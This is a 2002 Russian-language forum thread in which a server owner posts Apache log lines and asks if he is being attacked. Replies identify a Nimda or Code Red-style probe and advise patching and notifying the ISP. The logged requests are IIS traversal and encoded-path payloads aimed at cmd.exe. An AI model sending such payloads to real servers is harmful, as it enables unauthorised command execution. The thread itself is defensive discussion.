Меня пытаются взломать?

bloodmeri · 05-05-2002, 01:10

212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
___________________________________________________

это кусок log файла от апачи сервера.
по моему это не должно так выглядеть.

посоветуйте б что енто такое

референт · 05-05-2002, 02:55

Обычная отака с использованием известных дыр.Вовремя ставить заплатки.И послать письмо с этими логами провайдеру в чьем ведении этот IP.Хотя ничего серьезного в этом нет.Пусть на халяву проверяют уязвимости сервера.

bloodmeri · 05-05-2002, 07:24

спасибо.
а то я сомневался в том что ето атака.
письмо уже послал.
пошел ставить заплатки

Moonshade · 06-05-2002, 01:22

Это похоже на Нимду или Редкод. Пашет только на непатченных IIS.

bloodmeri · 06-05-2002, 12:00

похоже что какая-то программа , потому что ломится целыми днями.
по IP можно как нибудь свяэатся с ним ?
netmeeting , ICQ , winpopup ?
потому как он может и не знает что от него кто - то ломится ?

05-05-2002, 01:10	#1
bloodmeri Камрад Join Date: апр 2000 Location: хайфа израиль Сообщений: 754	Меня пытаются взломать? 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 ___________________________________________________ это кусок log файла от апачи сервера. по моему это не должно так выглядеть. посоветуйте б что енто такое __________________ Linuх Is Likе А Wigwаm - Nо Windоws, Nо Gаtеs Аnd Аn Арасhе Insidе...
	Дневник [Ответить с цитированием]

05-05-2002, 02:55	#2
референт Камрад Join Date: мар 2002 Сообщений: 168	Обычная отака с использованием известных дыр.Вовремя ставить заплатки.И послать письмо с этими логами провайдеру в чьем ведении этот IP.Хотя ничего серьезного в этом нет.Пусть на халяву проверяют уязвимости сервера.
	Дневник [Ответить с цитированием]

05-05-2002, 07:24	#3
bloodmeri Камрад Join Date: апр 2000 Location: хайфа израиль Сообщений: 754	спасибо. а то я сомневался в том что ето атака. письмо уже послал. пошел ставить заплатки
	Дневник [Ответить с цитированием]

06-05-2002, 01:22	#4
Moonshade Камрад Join Date: дек 2000 Сообщений: 99	Это похоже на Нимду или Редкод. Пашет только на непатченных IIS.
	[Ответить с цитированием]

06-05-2002, 12:00	#5
bloodmeri Камрад Join Date: апр 2000 Location: хайфа израиль Сообщений: 754	похоже что какая-то программа , потому что ломится целыми днями. по IP можно как нибудь свяэатся с ним ? netmeeting , ICQ , winpopup ? потому как он может и не знает что от него кто - то ломится ?
	Дневник [Ответить с цитированием]